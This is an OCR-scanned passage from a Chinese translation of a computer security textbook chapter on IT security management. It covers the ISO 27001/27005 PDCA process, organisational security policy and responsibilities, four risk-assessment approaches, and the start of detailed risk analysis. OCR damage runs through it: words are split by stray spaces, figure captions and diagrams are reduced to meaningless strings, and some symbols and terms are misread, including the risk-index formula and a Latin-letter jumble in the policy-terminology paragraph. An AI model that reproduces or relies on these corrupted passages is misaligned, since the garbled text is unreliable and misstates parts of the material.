IT 安全 管理 过 程 的 重复 性 本 质 是 [ISO27001] 的 一 项 重点 内 容 ， 并 被 具体 应 用 到 
[ISO27005] 的 安全 风险 管理 过 程 中 。 这 个 标准 详细 刻画 了 一 个 过 程 模型 ， 该 模型 遵循 以 下 步骤 
来 管理 信息 安全 5: 

规划 (Plan): 建立 安全 方针 、 目 标 、 过 程 和 规程 ; 开展 风险 评估 ; 开发 选择 恰当 控制 措施 
或 者 接受 风险 的 风险 处 置 计 划 。 

实施 (Do): 实施 风险 处 置 计 划 。 


© ”改编 自 [ISO27005] 表 1 和 [ISO27001] 引言 。 
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检查 (Check): 监视 和 保持 风险 处 置 计划 。 
Sh (Act): 根据 事件 、 评 审 或 可 识别 的 变更 ,保持 和 改进 信息 安全 风险 管理 过 程 。 


IT 安 全 方针 组 织 情境 
风险 分 析 选 项 


安全 风险 分 析 
基线 ]( 非 形式 化 


pa 控制 措施 的 选择 
安全 计划 和 规程 的 开发 


| E 
实施 控制 措施 安全 意识 与 培训 











图 14-1 IT 安全 管理 概述 
14-2 (改编 自 [ISO27001] 图 1 ) 说 明了 这 个 过 程 。 该 图 与 图 14-1 是 一 致 的 。 这 个 过 程 
的 结果 应 当 是 使 得 相关 方 的 安全 需求 都 得 到 了 适当 的 控制 。 


相关 方 | axes 
\ ’ \ | 
六 《规划 ) < 
| \ j | 
| Ne x | 
=A ~) ERY 


14-2 “规划 -实施 -检查 - 处 置 ”过 程 模型 


14.2 ”组 织 的 情境 和 安全 方针 
IT 安全 管理 过 程 的 第 一 个 步骤 是 从 组 织 的 总 体 风险 状况 出 发 ， 研 究 制定 组 织 的 IT 安全 目 
标 、 战 略 和 方针 。 这 就 需要 考虑 作为 组 织 管理 之 组 成 部 分 的 更 广 的 组 织 目标 和 方针 。 组 织 的 安 


人 
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全 目标 确定 了 应 当 取得 什么 样 的 IT 安全 结果 。 为 了 支持 组 织 的 总 体 目标 ， 它 们 需要 处 理 组 织 
必须 保证 的 个 体 权 利 、 法 律 要 求 和 标准 。 组 织 的 安全 战略 确定 了 怎样 才能 达成 这 些 安 全 目标 。 
组 织 的 安全 方针 确定 了 需要 做 什么 。 这 些 目标 、 战 略 和 方针 需要 维持 并 依据 阶段 性 安全 评审 的 
结果 进行 定期 升级 ， 以 应 对 不 断 变化 的 技术 和 风险 环境 。 

为 了 帮助 确定 组 织 的 这 些 安全 目标 ， 需 要 分 析 组 织 内 信息 系统 的 角色 和 重要 性 。 这 些 系统 
的 价值 需要 从 支持 组 织 实现 其 目标 方面 重新 审视 ， 而 不 是 只 考虑 系统 的 直接 成 本 。 以 下 几 个 问 
题 对 阐明 这 一 点 有 所 帮助 : 

o 组 织 中 的 哪些 关键 方面 需要 IT 支持， 以 有 效 地 实现 其 功能 ? 

o 哪些 工作 只 能 在 IT 支持 下 执行 ? 

© 哪 项 重要 决策 依赖 于 信息 系统 所 管理 数据 的 准确 性 、 流 通 性 、 完 整 性 或 可 用 性 ? 

。 哪些 由 信息 系统 创建 、 管 理 、 运 行 和 存储 的 数据 需要 加 以 保护 ? 

© 组 织 的 信息 系统 出 现 安全 故障 时 会 给 组 织带 来 什么 后 果 ? 

如 果 以 上 某 些 问 题 的 答案 表明 信息 系统 对 组 织 实现 其 目标 而 言 是 重要 的 ， 那么 显然 应 当 评 
估 组 织 的 风险 ， 并 采取 适宜 的 措施 来 处 理 已 识别 的 缺陷 。 以 上 分 析 研 究 的 结果 应 该 是 组 织 的 关 
键 安全 目标 列表 。 

一 旦 列 出 了 目标 ， 就 可 以 形成 一 些 更 广泛 的 战略 表述 。 这 些 战略 表述 从 总 体 上 勾画 出 整 
个 组 织 如 何以 一 致 的 方式 来 实现 确定 的 目标 。 战 略 表述 的 主题 和 细节 由 已 确定 的 目标 、 组 织 的 
规模 和 信息 系统 对 组 织 的 重要 性 来 确定 。 战 略 表述 应 当 提 及 组 织 用 来 管理 其 信息 系统 安全 的 
方法 。 


有 了 组 织 的 安全 目标 和 战略 ， 就 可 以 制定 组 织 的 安全 方针 。 安 全 方针 描述 了 什么 是 目标 和 


战略 ， 以 及 实现 它们 的 过 程 。 组 织 或 公司 的 安全 方针 可 能 是 一 份 单独 的 大 文件 ， 或 者 更 多 情况 
下 是 一 套 相 关 的 文件 。 安 全 方针 通常 至 少 需要 说 明 下 列 主题 9 
o 方针 的 范围 和 目的 。 
。 安全 目标 与 组 织 的 法 律 法 规 义务 及 业务 目标 的 关系 。 
。 从 保密 性 、 完 整 性 、 可 用 性 、 可 核查 性 、 真 实 性 、 可 靠 性 等 方面 特别 是 从 资产 所 有 制 
的 角度 考虑 的 IT 安全 要 求 。 
与 IT 安全 管理 和 组 织 基础 设施 相关 的 职责 分 配 。 
组 织 所 采用 的 风险 管理 方法 。 
如 何 处 理 安全 意识 教育 和 培训 问题 。 
普通 人 员 特 别 是 受信 任 岗位 人 员 的 管理 问题 。 
员工 可 能 受到 的 法 律 处 罚 及 处 罚 的 适用 条 件 。 
系统 的 开发 和 采购 过 程 中 需要 考虑 的 安全 问题 。 
组 织 范围 内 采用 的 信息 分 类 方案 的 定义 。 
应 急 和 业务 连续 性 规划 。 
事件 检测 和 处 置 过 程 。 
评审 方针 的 方法 和 时 间 。 
。 控制 方针 变更 的 方法 。 
制定 方针 的 目的 是 对 组 织 的 IT 基础 设施 如 何 大 体 上 支持 其 总 体 业务 目标 做 出 清晰 的 概括 ， 
更 具体 地 说 ， 就 是 为 了 使 这 种 支持 的 效果 达到 最 佳 ， 必 须要 提出 哪些 安全 要 求 。 


日 改编 自 [ISO13335] 多 个 章节 的 细节 规定 。 
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术语 “ security policy” Cte FATEH IGE. VAR, AAAS EM (security policy) 是 
指 既 包括 总 体 安全 目标 和 战略 也 包括 诸如 已 定义 的 可 接受 行为 、 预 期 实践 和 职责 等 规程 性 策略 
的 文件 。RFC 2196 (安全 手册 网 站 ) 描述 了 这 种 形式 的 策略 。 “security policy” 的 这 种 解释 是 
在 本 章 描述 的 作为 过 程 的 IT 安全 管理 的 形式 规范 之 前 出 现 的 。 尽 管 从 以 前 的 “策略 ”发 展 到 
我 们 现在 所 说 的 “方针 ”应 该 经 过 一 系列 过 程 ， 但 是 这 里 没有 详细 的 资料 。 这 样 一 份 策略 的 内 容 
通常 包括 [ISO27002] 和 [NIST09] 等 标准 中 的 很 多 控制 域 ， 这 些 内 容 将 在 第 15 ~ 18 章 进一步 探讨 。 

上 述 组 织 安全 策略 的 一 个 真实 例子 来 自 总 部 设 在 欧盟 的 一 家 工程 顾问 公司 ， 见 本 书 网 站 的 
高 级 内 容 部 分 ( ComputerSecuirtyPolicy.pdf) 。 出 于 某 些 考虑 ， 文 档 中 出 现 的 这 家 公司 的 名 字 都 
改 成 了 “ 某 公司 ”。 该 公司 是 一 家 总 部 设 在 欧盟 的 工程 顾问 公司 ， 其 致力 于 为 全 世界 基础 设施 
建设 提供 规划 、 设 计 和 管理 服务 。 为 了 说 明 这 种 类 型 策略 的 详细 程度 ， 附 录 H.1 复制 了 该 文档 
的 第 5 节 ， 内 容 涵盖 物理 和 环境 安全 。 

关于 安全 策略 要 求 的 进一步 指导 ， 见 在 线 提供 的 附录 H.2， 其 中 包括 信息 安全 论坛 发 布 的 
《信息 安全 良好 实践 标准 》 提 出 的 规范 。 

术语 “security policy” 还 可 以 指 对 应 特定 系统 或 特定 控制 规程 与 过 程 的 特定 安全 规则 。 正 
如 我 们 在 第 13 章 讨论 可 信 技 术 时 ， 它 指 保 密 性 和 完整 性 的 形式 模型 。 然 而 在 本 章 ， 我 们 用 这 
个 术语 来 描述 总 体 安全 目标 和 战略 ， 就 像 本 节 一 开始 所 描述 的 。 

Aan IT 安全 方针 得 到 高 级 管理 层 一 致 认可 和 接受 是 至 关 重要 的 。 经 验 表明 ， 如 果 做 不 
到 这 一 点 ， 将 很 难 获得 充分 的 资源 或 重视 程度 去 实现 既定 的 目标 并 取得 适当 的 安全 成 果 。 有 了 
高 级 管理 层 的 明确 支持 ， 安 全 才 更 有 可 能 被 组 织 内 各 级 人 员 严 肃 对待 。 这 种 支持 也 是 组 织 在 系 
统管 理 和 风险 状况 监视 方面 关注 且 尽 职 的 表现 。 

由 于 信息 安全 责任 由 整个 组 织 的 各 个 部 门 分 担 ， 那 么 就 存在 安全 执行 不 一 致 、 缺 乏 机 制 监 
控 的 风险 。 各 种 标准 均 强 烈 建 议 将 组 织 的 信息 安全 的 全 部 责任 归于 一 个 人 ， 即 组 织 的 信息 安全 
官 。 这 个 人 最 好 具有 一 定 的 信息 安全 背景 。 其 职责 包括 : 

e 监督 信息 安全 管理 过 程 。 

。 与 主管 信息 安全 的 高 级 管理 层 联 络 。 

e 维护 组 织 的 信息 安全 目标 、 战 略 和 方针 。 

o 协调 对 信息 安全 事件 的 响应 。 

e 管理 整个 组 织 的 信息 安全 意识 和 培训 计划 。 

e 与 IT 项 目 安全 官 相互 沟通 。 

更 大 的 组 织 还 需要 设置 分 别 负责 各 主要 项 目 和 系统 的 IT 项 目 安全 官 。 他 们 的 职责 是 开发 
和 维护 各 自 系 统 的 安全 方针 ， 开 发 和 实施 与 这 些 系统 相关 的 安全 计划 ， 解 决 这 些 计划 实施 过 程 
中 日 常 监测 到 的 问题 ， 并 协助 调查 涉及 这 些 系统 的 事件 。 


14.3 ”安全 风险 评估 


现在 我 们 将 注意 力 转 移 到 IT 安全 过 程 中 关键 的 风险 管理 部 分 。 这 个 阶段 至 关 重 要 ， 如 果 
没有 它 ， 将 很 可 能 使 资源 得 不 到 最 有 效 的 部 署 。 这 将 导致 部 分 风险 未 被 处 理 ， 使 得 组 织 留 下 
安全 薄弱 点 ， 同 时 其 他 保障 措施 的 部 署 也 可 能 因此 而 不 够 合理 ， 从 而 白白 地 浪费 了 时 间 和 金 
钱 。 理 想 状 态 下 ， 组 织 中 的 每 一 项 资产 都 应 该 受到 检查 ， 可 能 的 各 种 风险 都 需 进行 评估 。 如 果 


O ”英文 中 policy 的 含义 可 大 可 小 ， 分 别 对 应 中 文 的 方针 或 策略 。 因 此 ， 根 据 作者 的 本 意 ， 本 章 大 部 分 地 方 翻 
译 为 “方针 ”， 仅 在 此 处 出 现 “ 策 略 ”。 参 见 谢 宗 晓 等 著 《 ISO/IEC 27001:2013 标准 解读 及 改版 分 析 》29 页 
的 脚注 228、229 及 30 页 的 脚注 234 ~ 236. 一 一 译 者 注 
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某 种 风险 被 认为 很 严重 ， 就 有 必要 采取 适当 的 补救 控制 措施 ， 来 将 风险 降低 至 一 个 可 以 接受 的 
水 平 。 实 践 中 这 显然 是 不 可 能 的 。 考 虑 到 时 间 和 人 力 上 的 要 求 ， 即 使 是 大 型 的 、 资 源 丰 富 的 组 
织 ， 这 也 显然 是 既 不 可 行 也 不 合算 的 。 即 使 可 能 ， 考 虑 到 信息 技术 和 威胁 环境 的 快速 变化 ， 也 
将 意味 着 这 些 评 估 如 果 不 早点 开始 ， 就 很 可 能 会 出 现 其 做 完 时 就 已 经 过 时 了 ! 很 明显 ， 评 佑 方 


式 需 要 某 种 方式 的 折 中 。 


另 一 个 问题 是 如 何 确定 一 个 适当 的 风险 接受 水 平 。 在 理想 的 世界 里 ， 我 们 的 目标 应 该 是 完 
全 消除 所 有 的 风险 。 同 样 ， 这 也 是 不 可 能 的 。 一 个 更 现实 的 选择 是 耗费 一 定数 量 的 资源 以 降低 
风险 ， 而 所 需 开 销 是 与 风险 一 旦 发 生 将 给 组 织造 成 的 潜在 损失 成 正比 的 。 这 一 过 程 也 必须 考虑 
到 风险 发 生 的 可 能 性 。 对 可 接受 的 风险 水 平 的 确定 是 需要 审慎 管理 的 ， 也 就 是 说 所 耗费 的 资源 
从 组 织 的 可 用 预算 、 时 间 和 人 力 资源 角度 考虑 应 当 是 合理 的 。 风 险 评估 过 程 的 目的 是 为 管理 提 
供 必 要 的 信息 ， 在 有 效 部 署 可 用 资源 方面 做 出 合理 的 决策 。 

对 于 从 小 型 企业 到 跨国 公司 再 到 各 国政 府 的 不 同 规模 的 组 织 ， 显 然 需要 提供 不 同 的 风险 评 
估 方 案 。 目 前 有 一 些 正 式 标准 适合 于 IT 安全 风险 评估 过 程 ， 包 括 [ISO13335]、[ISO27005] 和 
[NIST12]。 特 别 地 ，[ISO13335] 给 出 了 识别 和 降低 一 个 组 织 的 IT 基础 设施 风险 的 4 种 方法 : 

o 基线 方法 

e 非 形式 化 方法 

© 详细 的 风险 分 析 

© 组 合 方法 

选择 什么 样 的 方法 是 由 组 织 的 可 用 资源 决定 的 ， 并 从 最 初 的 高 级 风险 分 析 开 始 ， 该 分 析 主 
要 考虑 信息 系统 的 价值 有 多 大 、 对 组 织 的 业务 目标 有 多 重要 。 法 律 和 规章 约束 也 可 能 要 求 特 定 
的 方法 。 该 信息 应 当 在 制定 组 织 的 IT 安全 目标 、 战 略 和 方针 时 确定 。 


14.3.1 基线 方法 


风险 评估 的 基线 方法 目的 在 于 使 用 基线 文档 、 实 用 规则 和 行业 最 佳 实践 来 实现 一 个 基本 的 
系统 安全 控制 水 平 。 这 个 方法 的 优点 是 ， 它 不 需要 消耗 在 进行 一 个 更 为 形式 化 的 风险 评估 时 所 
需 的 额外 的 资源 ， 并 且 在 一 系列 的 系统 上 ， 相 同 措施 都 可 以 重复 使 用 。 主 要 的 缺点 是 ， 没 有 从 
组 织 类 型 和 系统 使 用 方式 等 角度 对 组 织 风险 暴露 的 差异 进行 特别 的 考虑 。 并 且 ， 基 线 水 平 可 能 
被 设置 得 太 高 ， 导 致 安全 措施 太 昂贵 或 者 受到 限制 ， 以 至 于 可 能 得 不 到 批准 ; 也 可 能 设置 得 太 
低 ， 导 致 安全 性 不 足 ， 给 组 织 留 下 安全 薄弱 点 。 

基线 方法 的 目标 是 执行 普遍 认可 的 安全 控制 措施 ， 提 供 针对 最 常见 威胁 的 保护 。 这 应 当 包 
括 在 配置 和 部 署 系统 过 程 中 实施 行业 最 佳 实 践 ， 就 像 我 们 在 第 12 章 讨论 操作 系统 安全 时 所 提 
到 的 那样 。 就 这 一 点 而 言 ， 基 线 方法 为 进一步 安全 措施 的 确定 打下 了 和 良好 的 基础 。 适 当 基 线 的 
建议 和 核查 表 可 以 从 一 系列 组 织 获 得 ， 包 括 : 

e 各 种 国家 和 国际 的 标准 化 组 织 

e 安全 相关 的 组 织 ， 例 如 CERT、NSA 等 

e 行业 部 门 委员 会 或 峰会 集团 

单独 使 用 基线 方法 通常 仅 推荐 给 那些 没有 资源 去 实施 更 为 结构 化 方法 的 小 型 组 织 。 但 它 至 
少 确保 部 署 了 一 个 基本 水 平 的 安全 措施 ， 这 是 很 多 系统 的 默认 配置 所 不 能 保证 的 。 


14.3.2” 非 形式 化 方法 


非 形式 化 方法 需要 对 组 织 的 信息 系统 进行 一 些 非 形 式 化 的 实用 的 风险 分 析 。 这 种 分 析 不 使 
用 形式 化 的 、 结 构 化 的 流程 ， 而 是 利用 分 析 执 行人 员 的 知识 和 专业 技术 。 这 些 人 员 可 以 是 内 部 
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专家 ， 如 果 有 的 话 ， 也 可 以 是 外 部 顾问 。 这 个 方法 的 最 主要 的 优点 是 ， 执 行 分 析 的 人 员 不 需要 
额外 的 技术 。 因 此 ， 非 形式 化 的 风险 评估 的 进行 相对 更 快捷 和 经 济 。 另 外 ， 因 为 组 织 的 系统 一 
直 处 于 受 检查 状态 ， 所 以 具体 的 漏洞 和 风险 能 够 得 到 判定 ， 这 一 点 是 基线 方法 所 不 能 做 到 的 。 
因此 ， 我 们 将 能 够 使 用 比 基 线 方法 情形 下 更 为 准确 、 有 针对 性 的 控制 措施 。 这 种 方法 也 有 一 些 
不 足 。 因 为 没有 使 用 形式 化 的 流程 ， 将 有 可 能 导致 一 些 风 险 没 有 被 适当 地 考虑 ， 给 组 织 留 下 了 
潜在 的 弱点 。 还 有 ， 因 为 这 种 方法 是 非 形 式 化 的 ， 可 能 因 分 析 人 员 的 观点 和 偏见 而 导致 结果 有 
偏差 。 这 个 方法 也 可 能 导致 建议 的 控制 措施 不 能 得 到 充分 的 合理 性 证 明 ， 从 而 引发 关于 所 提议 
的 费用 是 否 确实 合理 的 质疑 。 最 后 ， 由 于 分 析 人 员 专 业 技 术 水 平 的 差异 ， 随 着 时 间 的 推移 ， 可 
能 出 现 不 一 致 的 结果 。 

非 形式 化 方法 的 使 用 ， 一 般 应 该 推荐 给 这 样 一 些小 型 或 中 等 规模 的 组 织 : 它们 的 信息 系统 
对 于 实现 其 业务 目标 并 非 必需 ， 且 不 能 证 明 风 险 分 析 造 成 的 额外 支出 的 合理 性 。 


14.3.3 ”详细 风险 分 析 


第 三 种 方法 是 最 全 面 的 一 种 方法 ， 就 是 采用 形式 化 、 结 构 化 的 流程 对 组 织 的 信息 系统 进 
行 详细 的 风险 评估 。 这 种 方法 最 大 限度 地 保证 了 所 有 重大 的 风险 都 得 到 确认 ， 相 关 的 问题 都 巴 
以 考虑 。 这 个 过 程 有 许多 阶段 ， 包 括 资产 识别 ， 资 产 面临 的 威胁 和 脆弱 性 的 识别 ， 对 风险 发 生 
可 能 性 、 风 险 发 生 后 对 组 织 可 能 造成 的 影响 的 判定 ， 最 终 得 出 组 织 所 面临 的 风险 。 有 了 这 些 信 
息 ， 就 能 选择 并 实施 适当 的 控制 措施 来 处 理 已 识别 的 风险 。 这 种 方法 的 优点 是 ， 它 为 组 织 的 信 
息 系统 提供 了 最 详细 的 安全 风险 分 析 ， 并 为 控制 措施 所 需 支出 提供 了 有 力 的 合理 性 证 明 。 它 还 
为 系统 发 展 变化 过 程 中 的 持续 安全 管理 提供 了 最 佳 的 信息 。 这 种 方法 的 主要 缺点 是 ， 实 施 这 样 
一 次 风险 分 析 ， 在 时 间 、 资 源 和 专业 技术 方面 需要 相当 的 成 本 。 这 种 分 析 所 用 的 时 间 ， 也 可 能 
会 导致 不 能 及 时 为 某 些 系统 提供 适宜 水 平 的 保护 。 这 种 方法 的 细节 将 在 下 一 节 讨 论 。 

对 于 政府 机 关 及 其 关键 服务 商 ， 采 用 形式 化 的 详细 的 风险 分 析 往 往 是 一 种 法 律 要 求 。 提 供 
关键 性 国家 基础 设施 的 组 织 可 能 也 是 同样 的 情况 。 对 这 样 的 组 织 ， 除 了 此 种 方法 ， 没 有 其 他 的 
选择 。 那 些 信息 系统 对 业务 目标 的 实现 至 关 重要 ， 并 具有 实施 这 种 风险 分 析 所 需 资 源 的 大 型 组 
织 也 可 以 选择 这 种 方法 。 


14.3.4 组合 方法 


最 后 这 种 方法 组 合 了 基线 方法 、 非 形式 化 方法 和 详细 的 风险 分 析 方 法 的 元 素 。 它 的 目标 是 
尽 可 能 快 地 提供 一 个 合理 水 平 的 保护 ， 然 后 不 断 地 检查 和 调整 部 署 在 关键 系统 上 的 防护 控制 措 
施 。 这 种 方法 首先 在 所 有 系统 上 实施 适当 的 基线 安全 建议 。 然 后 ， 通 过 高 级 风险 评估 识别 那些 
面临 高 风险 或 对 组 织 业务 目标 至 关 重 要 的 系统 。 它 可 以 做 出 决定 立即 对 关键 系统 进行 一 次 非 形 
式 化 风险 评估 ， 从 而 相当 迅速 地 调整 控制 措施 ， 以 便 更 准确 地 反映 系统 要 求 。 最 后 ， 它 可 以 建 
立 对 这 些 系统 实施 详细 的 风险 分 析 的 有 序 过 程 。 随 着 时 间 的 推移 ， 这 将 使 得 最 适当 、 最 经 济 的 
安全 控制 措施 被 选择 出 来 并 用 于 这 些 系 统 中 。 这 个 方法 有 很 多 重要 的 优点 。 最 初 采用 高 级 风险 
分 析 来 决定 哪里 需要 花费 更 多 的 资源 ， 而 未 采用 对 于 所 有 系统 的 全 部 细节 的 风险 分 析 ， 很 可 能 
更 容易 说 服 管理 层 。 此 方法 还 会 形成 一 幅 关 于 IT 资源 和 主要 风险 多 发 位 置 的 战略 性 画面 。 这 
为 以 后 对 组 织 的 安全 管理 进行 规划 提供 了 重要 的 帮助 。 基 线 方 法 和 非 形式 化 分 析 方 法 的 使 用 确 
保 了 基本 的 安全 防护 措施 能 够 尽早 实施 。 这 也 意味 着 资源 更 有 可 能 得 到 有 效 的 利用 ， 而 处 境 最 
危险 的 系统 则 可 以 尽 可 能 早 地 得 到 进一步 分 析 。 然 而 ， 这 种 方法 也 有 一 些 缺 点 。 如 果 最 初 的 高 
级 分 析 不 准确 ， 那 么 一 些 本 应 接受 详细 风险 分 析 的 系统 在 一 段 时 间 内 仍 将 是 脆弱 的 。 尽 管 如 
此 ， 基 线 方法 的 使 用 将 保证 那些 系统 具有 基本 的 最 低 安全 水 平 。 而 且 ， 如 果 对 高 级 分 析 的 结果 
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进行 适当 的 复查 ， 那 么 遗漏 脆弱 性 的 可 能 将 被 最 小 化 。 
[ISO13335] 认为 ， 对 于 大 多 数组 织 ， 在 大 多 数 环境 下 ， 这 种 方法 具有 最 佳 性 价 比 。 因 此 其 
得 到 强烈 推荐 。 


14.4 ”详细 的 安全 风险 分 析 


形式 化 的 、 详 细 的 安全 风险 分 析 方 法 ， 对 组 织 的 信息 系统 安全 风险 提供 了 最 准确 的 评 
估 ， 但 是 成 本 却 最 高 。 这 个 方法 与 可 信 计 算 机 系统 的 发 展 有 关 ， 其 最 初 关 注 于 处 理 国防 安全 
问题 ， 正 如 我 们 在 第 13 章 中 所 讨论 的 。 最 初 的 安全 风险 评估 方法 论 出 现在 黄皮书 标准 (CSC- 
STD-004-85，1985 年 6 月 ) 中 ， 这 是 最 初 的 美国 TCSEC 彩虹 书 系列 标准 之 一 。 它 把 重点 完全 
放 在 保护 信息 保密 性 方面 ， 反映 出 军 方 对 信息 分 类 的 关注 。 它 推荐 的 可 信 计 算 机 系统 的 分 级 
方法 依赖 于 最 小 用 户 安全 许可 与 最 大 信息 分 类 的 差 值 。 具 体 来 说 ， 它 定义 风险 指标 为 

风险 指标 二 最 大 信息 敏感 性 一 最 小 用 户 安全 许可 

该 标准 有 一 张 表 ， 对 于 每 个 风险 等 级 列 出 了 适当 的 系统 范围 ， 该 表 曾 被 用 来 选择 系统 类 
型 。 很 明显 ， 这 种 受 限 的 方法 既 不 能 适当 地 反映 所 需要 的 安全 服务 的 范围 ， 也 不 能 适当 地 反映 
可 能 发 生 的 种 类 繁多 的 威胁 。 此 后 经 过 很 多 年 ， 真 正 考虑 上 述 问题 的 安全 风险 评估 实施 过 程 才 
逐渐 形成 。 

很 多 国家 标准 和 国际 标准 包含 了 人 们 所 期 待 的 形式 化 风险 分 析 方 法 。 其 中 包括 
[ISO27005]、[NIST12]、[ISO31000]、[SASN06] 和 [SA04]。 政 府 组 织 和 相关 厂商 通常 强制 要 求 
采用 这 种 方法 。 这 些 标准 大 体 采用 了 相同 的 过 程 。 图 14-3 (复制 自 [NIST12] 图 5 ) 描述 了 一 个 


典型 的 流程 。 
第 1 步 : 准备 评估 
从 组 织 层面 起 步 












第 2 步 : 进行 风险 分 析 


识别 威胁 源 和 事件 


识别 脆弱 性 和 诱发 条 件 
确定 发 生 的 可 能 性 
确定 影响 程度 










HERRN. Grose 
DEAE . AR 








图 14-3 风险 评估 过 程 
14.4.1 情境 和 系统 特征 


第 一 步 称 为 “情境 或 系统 特征 建立 ”。 其 目的 是 确定 在 将 要 进行 的 风险 评估 中 使 用 的 基本 
参数 ， 然 后 识别 需要 检查 的 资产 。 
情境 建立 ”风险 评估 过 程 从 组 织 的 安全 目标 人 手 ， 考 虑 组 织 暴 露 的 广泛 风险 。 这 将 发 现 并 
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非 所 有 的 组 织 都 具有 同样 的 风险 ， 某 些 组 织 会 因为 其 功能 而 受到 攻击 者 的 特别 关注 。 这 需要 控 
究 特定 组 织 与 其 所 处 的 更 广阔 的 政治 和 社会 环境 的 关系 。 图 14-4 (改编 自 IDC 2000 报告 ) 建 
议 了 一 种 可 能 的 组 织 风险 图 谱 。 与 政府 或 银行 金融 业 相 比 ， 诸 如 农业 和 教育 这 样 的 行业 所 面临 
的 风险 就 较 小 。 注 意 ， 这 种 分 类 方法 是 于 9: 11 事件 之 前 做 出 的 ， 由 于 情况 的 发 展 ， 目 前 可 能 
已 经 有 所 变化 。 例 如 ， 特 别 是 公用 事业 ， 其 实际 风险 可 能 比 上 述 分 类 方法 中 建议 的 要 高 。NIST 
指出 9， 下 述 行业 的 监控 与 数据 采集 (SCADA) 和 过 程控 制 系统 对 于 风险 更 为 脆弱 : 电力 、 给 
排水 、 石 油 天 然 气 、 运 输 、 化 学 、 制 药 、 纸 浆 和 造纸 、 食 品 饮料 、 离 散 制造 (汽车 、 航 空 和 耐 
用 消费 品 )、 航 空 和 铁路 运输 、 采 矿 和 冶金 。 





图 14-4 通用 的 组 织 风险 情境 


在 确定 组 织 暴露 的 广泛 风险 的 同时 ， 也 必须 识别 出 来 任何 相关 的 法 律 和 规章 约束 。 上 述 特 
征 为 组 织 的 风险 暴露 提供 了 一 个 基线 ， 并 对 管理 这 些 风险 以 保证 业务 的 成 功 运行 所 需 耗 费 的 大 
量 资源 做 出 了 初步 的 说 明 。 

其 次 ， 高 级 管理 层 必须 定义 组 织 的 风险 偏好 ( risk appetite)， 即 组 织 所 能 接受 的 风险 水 平 。 
同样 ， 这 在 很 大 程度 上 取决 于 组 织 的 类 型 及 管理 层 对 其 业务 经 营 方 式 的 态度 。 例 如 ， 银 行 和 人 金 
融 组 织 往往 十 分 保守 ， 持 风险 规避 态度 。 这 意味 着 他 们 希望 残余 风险 越 低 越 好 ， 并 且 愿 意 耗 费 
必要 的 资源 来 达到 此 目标 。 相 反 ， 拥 有 新 品牌 产品 的 领先 厂商 则 可 能 有 大 得 多 的 风险 耐 受 度 。 
这 类 厂商 愿意 冒险 来 获取 竞争 优势 ， 因 而 不 希望 在 安全 控制 方面 投入 更 多 资源 。 这 种 决策 方法 
并 不 仅仅 针对 IT 领域 ， 其 反映 了 组 织 在 业务 经 营 方 面 的 总 体 管理 方法 。 

随后 识别 风险 评估 的 边界 。 其 范围 可 能 从 单独 某 一 系统 或 者 组 织 的 某 一 方面 到 组 织 的 整个 
IT 基础 设施 。 这 将 部 分 取决 于 所 采用 的 风险 评估 方法 。 一 种 组 合 方法 要 求 随 着 组 织 安全 状况 
的 变化 ,不断 对 各 关键 组 件 分 别 进行 评估 。 同 时 你 也 将 发 现 ， 并 非 所 有 的 系统 都 处 于 组 织 的 控 
制 之 下 。 特 别 是 当 某 些 服 务 或 系统 由 外 部 提供 时 ， 就 可 能 需要 单独 考虑 它们 。 过 程 中 的 各 种 干 
系 人 同样 需要 识别 出 来 ， 需 要 确定 由 谁 来 运行 和 监控 组 织 的 风险 评估 过 程 。 另 外 ， 过 程 所 需 的 
资源 必须 给 其 分 配 。 所 有 的 这 些 都 需要 取得 高 级 管理 层 的 支持 ， 因 为 他 们 的 承诺 对 于 过 程 的 成 
功 完 成 是 至 关 重 要 的 。 

需要 决定 风险 评估 过 程 具体 应 用 的 评估 准则 。 尽 管 对 此 过 程 已 达成 广泛 的 共识 ， 但 实际 
的 细节 和 应 用 的 表格 仍 有 相当 大 的 不 同 且 还 在 不 断 变化 中 。 可 以 根据 该 组 织 或 相关 组 织 以 前 所 
应 用 的 评估 准则 来 做 出 决定 。 对 政府 组 织 来 说 ， 可 以 根据 法 律 或 规章 要 求 来 决定 评估 准则 。 最 
后 ， 风 险 分 析 实施 人 员 也 可 以 根据 自身 的 知识 和 经 验 来 决定 评估 准则 。 

资产 识别 ”风险 评估 第 一 步 的 最 后 一 项 内 容 是 识别 需要 分 析 的 资产 。 这 直接 解决 我 们 在 本 
章 之 初 提出 的 三 个 基本 问题 中 的 第 一 个 问题 :“ 我 们 需要 保护 哪些 资产 ?” 资 产 (asset) 是 对 组 
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织 有 价值 、 对 组 织 成 功 实现 目标 有 帮助 而 “需要 保护 的 任何 事物 ” 。 就 像 我们 在 第 1 章 中 讨论 
的 ， 资 产 既 可 以 是 有 形 的， 也 可 以 是 无 形 的 。 它 包括 了 计算 机 和 通信 硬件 基础 设施 、 软 件 ( 包 
括 应 用 程序 和 保存 在 这 些 系 统 中 的 信息 /数据 )、 这 些 系统 中 的 文件 ， 以 及 管理 和 维护 这 些 系统 
的 人 员 。 在 风险 评估 的 边界 之 内 ， 需 要 识别 这 些 资 产 ， 其 对 组 织 的 价值 需要 评估 。 需 要 重申 的 
是 ， 尽 管理 想 情 况 下 应 该 考虑 每 一 个 能 够 想到 的 资产 ， 但 在 实践 中 这 是 不 可 能 的 。 这 里 的 目标 
应 该 是 识别 所 有 对 实现 组 织 目标 有 重大 作用 、 一 且 受 损 将 严重 影响 组 织 运行 的 资产 。[SASN06] 
描述 了 这 样 一 个 由 在 识别 出 对 于 组 织 最 为 重要 的 那些 资产 的 “关键 性 评估 ”过 程 。 

尽管 风险 评估 过 程 大 多 由 安全 专家 管理 ， 但 他 们 并 不 一 定 高 度 熟 悉 组 织 的 运作 和 结构 。 因 
而 他 们 需要 吸收 组 织 中 相关 领域 人 员 的 专业 知识 ， 用 来 识别 关键 资产 以 及 这 些 资 产 对 组 织 的 价 
值 。 这 一 步 的 一 个 关键 要 素 就 是 识别 这 些 人 员 并 与 之 访谈 。 前 面 所 列 出 的 许多 标准 都 包含 了 各 
类 资产 的 核查 表 和 收集 必要 信息 方法 的 建议 。 应 考虑 和 使 用 这 些 标 准 。 这 个 步 又 的 输出 结果 应 
当 是 一 份 资产 清单 ， 其 中 简要 描述 了 这 些 资 产 在 组 织 中 的 用 途 和 价值 。 


14.4.2 威胁 /风险 /脆弱 性 的 确认 


过 程 的 下 一 步 是 识别 资产 暴露 在 什么 样 的 威胁 或 者 风险 下 。 这 直接 解决 三 个 基本 问题 中 的 
第 二 个 问题 :“ 这 些 资产 受到 了 怎样 的 威胁 ?” 这 里 对 使 用 的 一 些 术语 需要 作 一 些 说 明 。 术 语 
